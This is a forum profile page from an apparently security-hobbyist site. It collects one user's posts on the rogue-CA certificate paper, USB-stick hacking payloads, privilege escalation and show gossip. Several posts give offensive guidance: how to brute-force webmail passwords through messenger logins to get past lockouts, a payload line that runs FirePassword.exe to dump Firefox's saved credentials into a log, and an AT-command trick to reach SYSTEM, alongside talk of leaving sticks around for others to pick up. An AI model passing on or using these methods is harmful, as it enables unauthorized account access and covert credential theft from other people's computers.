Sloth
-
Posts
14 -
Joined
-
Last visited
Posts posted by Sloth
-
-
If you missed the amazing live streaming lecture from the 25th Chaos Communication Congress in Berlin this morning you really missed out on a great presentation. Never fear though the paper from Alexander Sotirov & associates has already surfaced on the interweb. The paper outlines the full attack (minus some critical reproduction info) of how one would go about creating and using a rogue CA certificate, that theoretically could cripple the internet and cause global user panic (ok maybe i'm being a bit to dramatic, but still). Yes i know this sort of attack has been theory for sometime but now it has been POCed (talk about one hell of a man in the middle attack). Oh well enough of my senseless babel.....on to the link:
http://www.win.tue.nl/hashclash/rogue-ca/
Hope you all enjoy this paper as much as myself :)
-Sloth
-
Haha and girls who'd sell their body for an Epic Mount in WoW :P
wait hold up we talking about riding or flying? im cheap...
-
...If there is personal politics involved (fighting etc) then that is their business.
disagree, fighting makes for a good drama :) if so many people are disappearing maybe its time for a Hak5 casting session! Personally Darren is my fav. :P
more on topic sucks to see change in cast and sad to see people go. but even in the greatest of tv shows the cast changes up from time to time. oh well as long as i'm not left mistrusting my technolust i don't care :)
-
:'(
-
and plus you never know when you might be in need of a magnet ;)
-
ok just thought i would throw my 2 cents in here. hacking a hotmail account or equivalent (i.e Gmail, Yahoo, AoL) via brute force is possible. i am not going to spoon food you a skiddie program as im sure your google-fu could use the training. but the process works a bit like this:
Hotmail, Yahoo, and Gmail all have security features on their "websites" that do lock outs or require capchas to be typed. So to circumvent this problem you turn to their messenger service which do not have these features (i.e. MSN Messenger, Yahoo Messenger, AiM). From there you can freely at your leisure brute force away with out the worry of the 5 try lock out. Even though an account may of been used strictly for "e-mail" and never for the instant messenger aspect there is nothing stopping you from logging into it via. The pass and s/n are the same as the http e-mail login.
Good Luck in your google searches. And thats about all i will say on this matter.
-Sloth
-
found this an interesting read
http://www.mythtv.org/wiki/index.php/Contr...tTV_D11_via_USB
hope it helps...
-
@ rastetter
not to get in the middle of a lovers quarrel or anything but...if you were to read through the 28 pages it is noted atleast a dozen an a half times the drives that work...i mean i know some people are to eager to read through all the discussion and development tips on projects in forums, specially when there over 25 pages long...but i know i always try to befor i ever try anything or even start to ask questions...considering that through out the past 28 pages i have seen snibits of code pop up here and there that are not included in any payload on the wiki...nice little additions for personal preferances that users developed....oh well this goes for everyone i suppose who is new to the use of forums...people generally get mad when they answer the same questions over and over and over in a developmental thread...oh well just my 1 9/10 cents...
@ aardwolf
yeah i agree with the why the hell would a n00b want to even mess with this but hey if i get time ill put ya together a nice lil how-to & Faq for you to sticky -=o)
-Sloth
-
Just to add my little piece to this project, I came across this little gem called firepassword that will get the username/password of everything firefox is told to remember. The only limitation is that the program cannot bypass master passwords. Installation is simple just copy the 3 files to WIPCMD and add this line to your go.cmd.
FirePassword.exe >Documentslogfiles%computername%.txt
I edited my go.cmd so a new folder was created just for this txt file. If anyone needs this more explained I can post the changes I made.
Here's the link for that program
sircrumpet-
found that back on page 17...hope thats what you were looking for.
-Sloth
-
kind of off topic but referring back to my last post about the privlage escalating, it seems that one of the computers i tested it on had some spyware running on it and now everytime i log on with the username i tested it with it automaticly boots me into system, which i think sucks personally...so just wanted to give fair warning to anyone who is going to mess around with the privlage escalating to make sure you have NO unwanted apps that you dont want to obtain "system"...oh well...
-Sloth
-
Sorry for the second post but has anybody else seen the story that is floating around digg.com at the moment.
http://passivemode.net/updates/2006/6/5/wi...on-exploit.html
It allows you to get admin using just the AT command.
I am working on integrating it into my USB key, i will let you know the results. Unfortunatley it does mean the key has to be in there for about a minute and a half but it might help.
correct me if im wrong but i dont think this works the way you think it does.
ok the only way i got this to work was by trying from admin account to escalate to system, this did not work to escalate from limited user to system. maybe i did something wrong but i think it was a proof of concept to get higher privlages than admin, not an actual escalation from limited to higher privlage.
-Sloth
-
I ask because the Staple's near my house just opened had has the 1 gig SanDisks for $25.
actually all staples are running this promo untill the 23rd
512mb = 14.99
1gig = 24.99
2gig = 44.99
all U3 enabled Sandisk Cruzer Micros
-
So obviously bigger is always better, (at least in my opinion) but I was just wondering what size U3 stick everyone is running? does the 256mb U3 sticks work rather well or is there just not enough room for all the fun stuff and then all those logs you been packing on there. Is the 2 or 4gig sticks just way to big and dare I say it over kill? Just wondering what the general consensus is on size before I go buying a bunch to leave laying around places.
Edit: also what sizes are being used for the standard USB sticks? got a couple free 64meg ones layin about.
-Sloth
25c3: MD5 Considered Harmful today
in Security
Posted
it was this morning at 9:15am est @ 25c3 in Berlin lol....
and a bit more proof for ya mate hope that helps you classify this a bit more correctly
Security Alerts:
http://www.microsoft.com/technet/security/...ory/961509.mspx
http://blog.mozilla.com/security/2008/12/3...ficate-forgery/
Wired news article:
http://blog.wired.com/27bstroke6/2008/12/berlin.html